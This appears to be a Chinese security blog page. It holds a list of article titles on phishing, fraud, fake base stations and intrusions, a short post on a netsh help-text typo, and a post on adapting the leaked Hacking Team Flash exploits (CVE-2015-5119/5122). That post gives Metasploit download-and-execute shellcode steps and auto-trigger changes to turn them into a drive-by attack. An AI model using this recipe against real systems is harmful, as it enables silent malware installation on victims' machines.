探秘短信马产业链-从逆向到爆菊 探秘伪基站产业链 您的工商银行电子密码器将于次日失效?伪基站垃圾短信,网银钓鱼诈骗! 谷歌云端硬盘在天朝是否真的安全? 朋友点开一个文件给骗30万,一种“高级”QQ诈骗骗术,远控电脑诈骗 关于伪基站的一些问题:信号覆盖范围?设备成本?是否违法?教程资料? 【巨狗血!】奇葩的比特币钓鱼案例!!!!!! 抛砖引玉,扒扒伪基站那些事 伪基站是怎么定位的呢?定位并抓捕伪基站、圈地短信、垃圾短信犯罪团伙! 【讨论】伪基站、圈地短信设备是怎么做出来的? 偷取一个人的钱包,还能让他告诉我信用卡的提款密码 ? 技术讨论:关于盗取支付宝讨论 【防骗】又见网银诈骗,骗子冒充朋友,借口卡丢了先借你卡转账用用,揭秘! 全方位在互联网中保护自己第七章(上网习惯以及计算机唯一代码追踪的防范) GSM Hackeing 之 SMS Sniffer 学习 京东 淘宝 天猫订单信息泄露诈骗, 接到“京东”的客服电话之后遭遇团伙诈骗 金融改革记录片(97% Owned)-97%被私人银行占据的无中生有债务货币 动画科普:银行与货币系统真相,动画揭露货币系统真相 如何发现系统中的异常,交易系统异常行为监控机制讨论 [技术分析]利用波士顿马拉松爆炸案热点的新型APT攻击 了解你的对手:追踪快速响应的APT攻击 【讨论】今天偶遇淘宝另类“骗钱”技巧 淘宝一星期【骗】20万的可行性过程分析 服务器流量异常追踪--抵抗AWVS扫描 【略狗血】一种结合本地程序的更加猥琐的钓鱼方式(中招率+100%) 阴谋论:政府通过手机基站的电子精神控制 adobe 1.5亿泄露数据 密码算法逆向挑战 逆向追踪之:通过QQ群里的图片逆向入侵,拿了几个phpddos的脚本 一个反制钓鱼邮件的思路 CDN流量放大攻击思路 讨论下快捷支付存在的风险 讨论下快捷支付存在的风险 娱乐贴:打击网络诈骗 - 骗子骗钱反被骗 - 发个骗子的手法,其实还是时时彩 全方位在互联网中保护自己第六章(国产软件或后门软件的替代品(下)) 逆向追踪:查找360wifi(知道ssid)的使用者 全方位在互联网中保护自己第三章(知识普及篇—了解网监的实力与暗箭(下) 全方位在互联网中保护自己第一章(知识概念篇第一部分) 简单分析丝绸之路创始人如何被抓,FBI真的能透过TOR获取真实IP么? 全方位在互联网中保护自己第五章(国产软件或后门软件的替代品(中)) 全方位在互联网中保护自己第四章(国产软件或后门软件的替代品(上)) 全方位在互联网中保护自己第二章(知识普及篇第二章-了解网监的实力与暗箭(上)) QQ鱼饵病毒:巧妙突破QQ客户端对钓鱼网站拦截 求黑产大牛目测,一位妹纸的亲身经历,身份证号+手机号洗你银行卡 如何用意念获取附近美女的手机号码,伪装免费CMCC信号,钓鱼妹子手机号码 怪异!10086短信接口泄露?10086发博彩、赌博短信 银行卡里钱莫名其妙被转走了,有身份证号码、姓名、银行卡号就能提款? 注意,日站的时候请清理cookie或使用虚拟机,否则可被cookie追踪 现在傻逼太多,骗人太好骗,淘宝搜剑灵激活码,好多10几块钱的骗子 如何看两个ip是不是在一个机房,路由追踪 猜想:利用GFW使中国对外网络瘫痪??? 逆向追踪之:网站被挂淘客跳转以后发生的事情 猜想_利用终端查询机日内网 免费购物 会员卡加钱??? 【逆向爆菊】某DDOS事件逆向追踪。。。有人深挖过吗? “伪基站”任意冒用手机号短信诈骗 别对我撒谎 让支付简单一点 如何保护自己之防非IP方式追查,黑钱提线,赃物收货。。。。 为抓小偷 俄警方在地铁安装能读取乘客手机信息的设备,这是啥技术? 山西破获首起“伪基站”案件 逆向爆菊、反向追踪之:追查史上最奇葩的“挂马”黑客! 物理设备安全大牛 Barnaby Jack 挂了... 保护自己之手机定位信息收集 一个诈骗类的技术性问题,朋友的! 请教关于手机IMEI定位的问题 安全跑路指南2013之乌云版【连载中】 一种巨猥琐的挂马方法、超淫荡的APT攻击思路:如果这么挂马会不会挂进内网 女士回电信诈骗电话 几秒钟时间100元话费没了 发两个qq钓鱼站点 求测试 - 乌云白帽子 XSS 实例 刚刚看到个鱼站,然后就被轮流爆菊了…… 小型APT之看我如何入侵电视,我是如何入侵智能电视的 一张随意拍摄的波士顿马拉松比赛照片,如何帮助FBI破案 我们是如何通过一张照片定位到疯狗位置的 分享下自己使用的保护方法篇章二(虚拟机模板环境设置) 连载中... 针对莱特币的新木马被发现 分享下自己使用的保护方法篇章一(虚拟机代理中转服务器设置)连载中... 分享下自己使用的保护方法篇章一(虚拟机代理中转服务器设置) 连载中... 使用电视棒接收飞机信号 简单的实现方法 超级短信DDOS 女生一天收上万条10086短信 还有近50万条等着她 微信聊天都是你好友吗?“诈骗”之“微信社工学” 【姊妹花】淘宝一敬业诈骗【50和我谈了一个小时】 R820T电视棒+软件无线电跟踪飞机飞行轨迹(SDR&ADS-B) rtl-sdr,RTL2832+E4k tuner电视棒跟踪飞机轨迹 ADS-B/TCAS/SSR rtl-sdr,RTL2832电视棒跟踪飞机轨迹教程(ADS-B), SDR GPS 飞机追踪 雇黑客攻陷招生网站改成绩 3骗子做发财梦进看守所 淘宝钓鱼诈骗,如今淘宝各个分支产业对网民不利的分支缺陷 公布一个非常高端的淘宝店铺骗局方法 户外物理设备入侵之:入侵并“调教”中控指纹语音考勤系统(打卡机) 上来吐个槽,再次侦破一宗牵扯到全国多个大型医疗集团的恶性案件! 再次遭遇 GoTop 挂机刷钱“病毒”,逆向爆菊,追踪背后“牧马人” 公共无线安全——FakeAP之WiFi钓鱼 GNU Radio USRP OpenBTS 小区短信 区域短信 一种牛逼的短信群发技术 GNU Radio 小区短信 区域短信 免费发 无法拦截 【传奇】看职业骗子如何揭发谷歌广告服务的不法活动,谷歌5亿美元和解费 钓鱼之XSIO漏洞,一个非常猥琐的“漏洞” 54dns劫持实现dns钓鱼攻击威胁? 百度搜索页面劫持脚本,百度搜索来路页面跳转劫持,骗点击 上海伊莱美医院被黑、黑帽SEO做淘宝客,核总深入追查,揪出内鬼! 支付宝木马爆菊过程总结帖【附源码】 接上一章节,支付宝木马,后续情节【2】 高级钓鱼攻击来了:针对拍拍的XSS攻击 接上一章节,支付宝木马,后续情节 360对你真的起作用了吗?bypass....分析支付宝网银木马,反爆菊花 一种猥琐方式的对攻击者定位(观315有感) 国外发现中国针对美国无人机厂商的APT攻击 中国是全球最大的的APT攻击来源 揭秘诈骗千万人民币的团伙及具体位置分析 淘宝又见好东西,低价格钓鱼几个倒霉蛋骗到手大额的款项,跑路、关店 核总霸气分析“天津丽人女子医院”主站被黑、挂淘宝客、黑帽SEO全过程! 公安部督办QQ红钻诈骗案破获 腾讯损失3000余万 中国电信ADSL宽带信息泄露,可查任意IP对应的宽带账号,电话号码,上门砍人 接着核总的《打击钓鱼,人人有责》之后的故事... 打击钓鱼,人人有责…… 研究人员首次发现用于针对性攻击的Android木马 【跟风贴】XSS挖出一个黑产团体 XSS挖出一个黑产团体 《XSS挖出一个黑产团体》 山寨广告非法医疗搜索引擎路在何方,医疗 = 巨型诈骗军团! 物理黑客户外硬件入侵之:某咖啡厅的广告展示终端…… 陌陌猥琐流定位妹纸精准位置 有图有真相 + 安卓工具 追查黑客姓名,邮箱,支付宝信息,惊现大规模僵尸网络,要求警方介入处理! 服务器被入侵之后,反爆1433抓鸡黑客菊花,并公布大量黑阔账号密码 公告:关于前两天本站无法打开的原因 + GFW拦截规则原理剖析 [讨论]如何入侵一个户外的电子显示屏 探索网络出口GFW的强度与翻墙 二维码应用漏洞|欺骗|....更多好玩的??? [fixed]中国移动139邮箱之前的一个重置密码流程漏洞 耍了一个发给我网购木马的骗子~~ Inception能入侵全盘加密的计算机,修改物理机器内存/任意密码进入 android 延迟锁定bug,安卓手机锁破解,屏幕解锁保护 关于手机的隐私保护。。 关于X卧底的通话监听、短信记录、定位追踪等侵犯隐私的行为讨论 支付宝的设计问题 401钓鱼新玩法,反向401钓鱼 远程入侵QQ好友所在网吧监控系统,人脸识别、定位坐标,定点打击 骗子卖家利用淘宝交易漏洞骗流量 追踪PlugX Rat作者,人肉定向攻击远控PlugX开发者 中斯警方联合行动抓获百名电信诈骗案嫌疑人 看新闻学知识之手机千里追回 西安丢iPhone定位在北京民警辗转2400公里追回 定位GFW的python脚本,如何找到GFW设备的IP地址 电话诈骗手段升级 听按键音破译银行密码 如果大量短信攻击会不会造成拒绝服务,导致手机接不进电话? 钓鱼网站诱骗支付占据网络不安全事件首位 微博“兼职”被骗3000 上网“报警”又被骗1300 东京大学加密招生海报解密过程(内含妹子) “钓鱼”网站横行:运营商与搜索引擎成帮凶 发现APT攻击的破绽 Android 无视屏幕解锁保护界面 - 安卓手机锁破解 网曝银行卡密码“漏洞” 网上团购月饼支付变游戏点卡 钓鱼网站借此牟利 视频:神奇的读心大师 网上有你的整个人生 利用社工+人肉来做神棍…… 十一黄金周 钓鱼网站常以优惠做诈骗噱头 《魔兽世界》截屏数据水印惊现用户私人数据 截图隐藏水印 暗含玩家信息 简单分析一个通过 js 劫持进行黑帽 SEO 做淘宝客的案例 如何从按键音中听出360总裁周鸿祎的手机号码 + 详细剖析 iPhone 短信欺骗漏洞攻击器、伪造短信号码工具、伪装发件人攻击器 Never trust SMS: iOS text spoofing,永远不要相信短信:iOS的文字欺骗 iPhone 短信欺骗漏洞披露,伪造短信号码、自定义短信手机号 男子淘宝购物10秒后接“卖家”电话 被骗7000元 找出 GFW 在 Internet 的位置、追踪 GFW 在互联网中的位置 德安全专家破解GSM加密算法 GSM网络破解 监听全球40亿部手机 非法获取百度推广账号 实施网络诈骗 篡改百度推广 市民被骗财 黑客在Defcon建立私人电话网络 - DEFCON 忍者 GSM 网络 支付宝错发中奖短信 送236台iPad2 网监如何爆菊?网警是如何通过层层VPN加密代理找到你的! 【需翻墙】网监如何爆菊?网警是如何通过层层VPN加密代理找到你的! 讲述一个关于高考的“黑客”故事:用2B铅笔“注入”阅卷系统 6000万网民一年被骗300多亿元 奇虎360成功加入GFW防火长城 为国家安全保驾护航 著名编剧宁财神被遭遇钓鱼淘宝 被骗近万元 虚假客服电话充斥互联网行骗 专家:竞价排名是祸首 公布 GFW 防火墙旗下部分子服务器 IP 电信诈骗韩国人案抓235人 涉案金额1亿多 男子侵入上海移动平台群发广告短信牟利获刑 福布斯:IE10“禁止追踪”扼杀网络广告市场 网购158元的货物之后被网站“钓”走2万 我国警方成功摧毁特大跨国跨两岸电信诈骗犯罪集团 美国秘密研制新概念网路武器 可攻击离线电脑 无线电信号渗透 Msnshell的那个有问题的官方下载链接追踪 刷下“拉卡拉”卡里2万多块钱丢了,复制银行卡,POS机、刷卡黑客 病毒集团盯上网络购物 在淘宝上被诈骗5.46万元 浙江绍兴一犯罪团伙用网银漏洞诈骗三百余万获刑 看FBI是怎么网络钓鱼执法的 华裔黑客 BITcrash44 凭借一台 iPhone4 拿下时代广场大屏幕 视频:国外黑客无线入侵、遥控电子路桥系统 视频:国外黑客无线入侵保时捷911,并且远程操控、遥控 视频:国外黑客利用一部诺基亚N95手机入侵火车站电子屏,并且现场直播 视频:国外黑客入侵高速公路交通电子屏 大屏系统被黑 泰国国会现场直播不雅照 碰到一个冒充QQ好友进行诈骗的骗子…… 利用电磁波进行入侵、原子级的黑客入侵、利用电磁波毁坏物理设备 QQ邮箱漏洞被骗子利用 小企鹅一闪1000块被骗走 电信诈骗,电话营销,一响挂电话,推销平安、人寿保险,冒充朋友 广东台湾两地警方联手破获电信诈骗大案 电视机会收到邻居游戏机画面?小霸王信号干扰?红白机功率这么强悍? 任何一种装机量巨大的软件,都有政府监控模块,我们应该如何保护自己? 我国将建立IP地址黑名单制度 打击网络垃圾邮件 小米官网“闹鬼” 消费者买手机三千元被骗 末世入侵行动 (Fire Sale!) 末日入侵行动 黑客曝联通“10010短信”漏洞 被指易遭诈骗利用 网络钓鱼危急行业发展 专家呼吁各方合力围剿 黑客考虑发射通讯卫星对抗全球互联网监管 Tabnapping 浏览器标签劫持 用假冒浏览器标签进行钓鱼攻击 GSM蜂窝基站定位基本原理浅析 用黑客方式找回失窃的电脑 - GSM基站定位 - Wifi热点定位 不要偷黑客的东西 - Why you don't steal from a hacker 惊爆!电影白蛇传说官网被挂“QQ中奖诈骗广告”! 物理攻击、抓频攻击 - 利用雷达来进行扫描网络弱点 解密电信诈骗:改号平台盗用110 日拨上万电话 67名跨国电信诈骗嫌犯从菲律宾押解回到福州 工程师网盗支付宝11万 开设79个账户转移盗款 【分析】腾讯独立域名QQ空间被钓鱼,腾讯官网被黑,被植入钓鱼页面! 男子信用卡绑定电话遭修改被盗刷7万元 北京警方破获新型网络合同诈骗案 黑客盯上外贸公司业务员邮箱 入侵员工电脑 跨国诈骗案 黑客的新目标:泄密其他黑客资料 台两15岁少年开淫窟 骗12名少女为“爱”卖身 月进300万元 【公告】警惕名为:Nuclear'Atk. QQ:424244818 冒充本人的骗子黑客 苹果iPhone和谷歌Android手机被曝"定位"用户 入侵者必读, 网警、公安是如何找到你的! 【视频】宝坻 - 历史上最胆大的银行劫匪 某人肉搜索的典型案例分析 一群推理神牛 无银行卡,密码10万元1分钟转走,超级黑客? 【公告】公布一个特大诈骗案件的网络“黑客” DRDoS 反弹DDoS攻击 反弹DDoS攻击 力度远大于分布式DDOS攻击 留言评论(旧系统): 佚名 @ 2015-07-17 23:29:41 跟看电影一样 本站回复: -_-!!! 核小弟 @ 2015-07-18 17:57:12 核老大,你为何这么屌,完全看的蒙,求解释~ 本站回复: 文章作者:鬼魅羊羔,-_-!!!,其实这类的很多的。 佚名 @ 2015-07-18 20:52:01 然并卵 本站回复: -_-!!! 验证码很吊? @ 2015-07-18 23:44:48 特地看看验证码的 本站回复: -_-!!! 佚名 @ 2015-07-20 14:46:08 本人在香港,請問有什麼項目可以合作,郵箱是nqjaj2qj@gmail.com 本站回复: 暂没有项目…… -_-!!! 佚名 @ 2015-07-21 21:58:16 在GA上班,内网上的一些电脑上的确在一段时间内出现过cool_gamesetup.exe这个恶意程序 本站回复: -_-!!! 佚名 @ 2015-07-22 10:34:36 通过调取当天下午到凌晨的监控记录,发现张xx为晚上21点左右到达单位,凌晨3点左右离开单位,而在早晨7点左右,在该办公室的另一个IP地址上,有人登陆业务系统, ---------------------- 管理员大半夜去干嘛? 本站回复: 去下毛片了。 ~~·~ @ 2015-07-28 09:46:41 监控设施不完善。没有保护案发现场 本站回复: +1 佚名 @ 2015-07-30 13:40:21 那么到底是谁干的呢? 本站回复: 你猜~

2015/7/15
articleCard.readMore

Hacking Team flash 0day 快速利用介绍

Hacking Team flash 0day 快速利用介绍 三好学生 | 2015-07-13 09:54 0x00 目标 利用Hacking Team 的flash 0day样本(CVE-2015-5119&CVE-2015-5122),改造升级,支持downloader&exec。 0x01 测试环境 Windows 7 SP1 (64-bit) ie8.0.7600.16385 Adobe Flash Player 18,0,0,194 0x02 样本分析 已知成功环境: Windows 7 SP1 (32-bit) IE11 Adobe Flash 18.0.0.194 Windows 7 SP1 (32-bit) Firefox 38.0.5 Adobe Flash 18.0.0.194 Windows 8.1 (32-bit) Firefox Adobe Flash 18.0.0.194 Linux Mint "Rebecca" (32 bits) Firefox 33.0 Adobe Flash 11.2.202.468 0x03 样本测试: swf文件,ie加载后点击Run calc.exe,弹出计算器 如图1: 0x04 简单修改 需要对样本做两处修改: 改造:实现downloader&exec 升级:swf加载后自动执行shellcode 1. 生成shellcode use windows/download_exec set exe set URL generate -t dword 2.生成swf 开发环境:Adobe Flash CS6 (1)替换shellcode ShellWin32.as和ShellWin64.as文件中Vector.<uint>内容改为shellcode (2)实现自动触发 修改MyClass.as文件 (3)编译 --- 仅作测试,不许抄作业,后果自负 [原文地址] 各种吐槽: 1# 浮萍 | 2015-07-13 09:55 图呢 2# 三好学生 | 2015-07-13 09:56 @浮萍 我先学习一下zone怎么用~ 3# 蒙塔基的钢弹 (放下面子,求真学习,拾起斗志,用心渗透!) | 2015-07-13 11:03 @三好学生 私信QQ了,可否即时交流下? 4# 三好学生 | 2015-07-13 11:25 @蒙塔基的钢弹 你骗我,我怎么没有发现私信 5# 0x02 | 2015-07-13 11:58 @三好学生 这个是还没写完?前排坐等 6# Sunshie (http://phpinfo.me欢迎友链) | 2015-07-13 12:06 https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/multi/browser/adobe_flash_nellymoser_bof.rb 7# 三好学生 | 2015-07-13 12:14 @0x02 已经无法再编辑,我该怎么办 8# DM_ (http://x0day.me) | 2015-07-13 12:16 zone里有markdown就好了 9# 三好学生 | 2015-07-13 12:27 其余内容已被DM_和谐,与本人无关 留言评论(旧系统): 佚名 @ 2015-07-16 10:41:29 这个MyClass.as文件怎么修改,请指教 本站回复: 具体你了解一下flash修改方法。 佚名 @ 2015-07-17 09:22:23 改成download_exec就不能运行了, 本站回复: 继续改。 佚名 @ 2015-07-20 16:25:55 win7 ie 还是崩溃 不中啊。。2003和xp是可以的 win7 要直接本地把swf拖进ie才可以。。 本站回复: -_-!!! 佚名 @ 2015-07-29 07:19:39 给下载到桌面了 怎么设置路径呢 本站回复: ?

2015/7/13
articleCard.readMore

无意中发现一个微软Windows系统自带命令“netsh”的狗血bug!

狗血的微软程序猿居然把“listenport”、“listenaddress”写错了,这是有多粗心…… 看图不解释…… 测试系统:Windows 7 x32 官方旗舰版(Microsoft Windows [版本 6.1.7600]) C:\>ver Microsoft Windows [版本 6.1.7600] C:\>netsh interface portproxy delete v4tov4 一个或多个重要的参数没有输入。 请验证需要的参数,然后再次输入。 此命令提供的语法不正确。请查看帮助以获取正确的语法信息。 用法: delete v4tov4 [listenport=]<integer>|<servicename> [[listenaddress=]<IPv4 address>|<hostname>] [[protocol=]tcp] 参数: 标记 值 listenport - 要侦听的 IPv4 端口。 listenport - 要侦听的 IPv4 地址。 protocol - 要使用的协议。当前仅支持 TCP。 注释: 删除要侦听的 IPv4 的项并通过 Ipv4 代理连接。 C:\>netsh interface portproxy delete v4tov6 一个或多个重要的参数没有输入。 请验证需要的参数,然后再次输入。 此命令提供的语法不正确。请查看帮助以获取正确的语法信息。 用法: delete v4tov6 [listenport=]<integer>|<servicename> [[listenaddress=]<IPv4 address>|<hostname>] [[protocol=]tcp] 参数: 标记 值 listenport - 要侦听的 IPv4 端口。 listenport - 要侦听的 IPv4 地址。 protocol - 要使用的协议。当前仅支持 TCP。 注释: 删除要侦听的 IPv4 的项并通过 Ipv6 代理连接。 C:\>netsh interface portproxy delete v6tov4 一个或多个重要的参数没有输入。 请验证需要的参数,然后再次输入。 此命令提供的语法不正确。请查看帮助以获取正确的语法信息。 用法: delete v6tov4 [listenport=]<integer>|<servicename> [[listenaddress=]<IPv6 address>|<hostname>] [[protocol=]tcp] 参数: 标记 值 listenport - IPv6 侦听端口。 connectaddress - IPv6 连接地址。 protocol - 使用的协议。现在只支持 TCP。 说明: 删除通过 IPv4 的 IPv6 和代理连接到的侦听项目。 C:\>netsh interface portproxy delete v6tov6 一个或多个重要的参数没有输入。 请验证需要的参数,然后再次输入。 此命令提供的语法不正确。请查看帮助以获取正确的语法信息。 用法: delete v6tov6 [listenport=]<integer>|<servicename> [[listenaddress=]<IPv6 address>|<hostname>] [[protocol=]tcp] 参数: 标记 值 listenport - IPv6 侦听端口。 connectaddress - IPv6 连接地址。 protocol - 使用的协议。现在只支持 TCP。 说明: 删除通过 IPv6 的 IPv6 和代理连接到的侦听项目。 C:\>what are you 弄啥嘞? by:https://lcx.cc/ -_-!!! 到底是“listenport”还是“listenaddress”还是“listenport”还是“listenaddress”…… what are you 弄啥嘞? WTF! 留言评论(旧系统): ` Helen @ 2015-07-12 23:33:31 我` Helen为此事负责。 本站回复: 请出示您在微软的工号,以便我们及时投诉! -_-!!! `%0aHelen @ 2015-07-12 23:37:56 我`%0a%0aHelen为此事负责! 本站回复: 请出示您在微软的工号,以便我们及时投诉! -_-!!! helen @ 2015-07-13 09:11:52 helen 已死 本站回复: -_-!!! xcl @ 2015-07-15 17:29:20 算0day吗 (抠鼻) 本站回复: 你猜~(手动斜眼) 佚名 @ 2015-07-16 19:55:49 我发觉了一个bash的奇葩漏洞。。 GendeiMac:~ Gen$ bash "what are you 弄啥嘞?" bash: what are you 弄啥嘞?: No such file or directory 本站回复: -_-!!! 天朝密探 @ 2015-08-20 23:59:01 看到这文章 下意识试试自己的 - - 与答案相符 100分 本站回复: -_-!!! 佚名 @ 2015-08-23 20:02:31 win10还是错的 本站回复: -_-!!!

2015/7/10
articleCard.readMore